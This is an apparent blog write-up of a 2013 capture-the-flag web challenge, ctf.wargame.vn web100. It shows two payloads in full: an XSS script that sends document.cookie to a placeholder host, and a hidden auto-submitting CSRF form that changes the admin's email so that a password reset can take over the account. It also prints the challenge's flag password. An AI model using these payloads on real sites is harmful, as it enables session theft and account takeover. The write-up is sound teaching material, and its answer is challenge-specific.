Monday, August 12, 2013

ctf.wargame.vn 2013 web100

URL:
http://challenges.wargame.vn:1337/web100_f977a5eaea38b2dcd992c112bdb84b9a/

Hint:
Hint 1: Real-world exploit ;) it's easy , it's not about SQLi ..
Hint 2: We will check your feedback! Please wait few minutes :)
After opening the link, we face the login page:

There are three buttons: Login, Register and Forgot?. Given hint 1, we don't need to waste time on SQL injection. Let's register first and log in to see what is inside. One thing to notice is that the username admin has already been taken.


Since there is no SQLi, we need to focus on the feedback form. My first thoughts are XSS and CSRF. Let's try XSS first by submitting a script as feedback:

<script>
function feedback()
{
    // send the current page's cookies to a server we control (placeholder domain)
    var url = "http://xxxx.com/?id=" + document.cookie;
    window.location.assign(url);
}
//feedback();
</script>
The only thing that shows up in my private log at http://xxxxx.com is phpsessid=xxxxxxxxxxxx. This means the site suffers from XSS and does not sanitize the feedback input. Now swap our cookie for the admin's cookie :)). "Hacker detected" =))
Turning to the CSRF exploit, think about what we can do to gain administrator privileges. Remember the Forgot function on the login page. So we can get the admin's password by making the admin change his/her email address to ours :)
Send him our script:

<div id="hidden_form_container" style="display: none;"></div>
<script>
  var theForm, newInput1, newInput2;
  theForm = document.createElement('form');
  theForm.action = '?act=change';
  theForm.method = 'post';
  newInput1 = document.createElement('input');
  newInput1.type = 'hidden';
  newInput1.name = 'email';
  newInput1.value = 'email@address.com';
  newInput2 = document.createElement('input');
  newInput2.type = 'hidden';
  newInput2.name = 'confirm';
  newInput2.value = 'Change Email';

  theForm.appendChild(newInput1);
  theForm.appendChild(newInput2);
  document.getElementById('hidden_form_container').appendChild(theForm);
  theForm.submit();
</script>

Log out, enter our email address and use the Forgot function. After a few minutes, check our email and we get the flag. The admin's password is: mario_x55_pwned_ubuntuforum
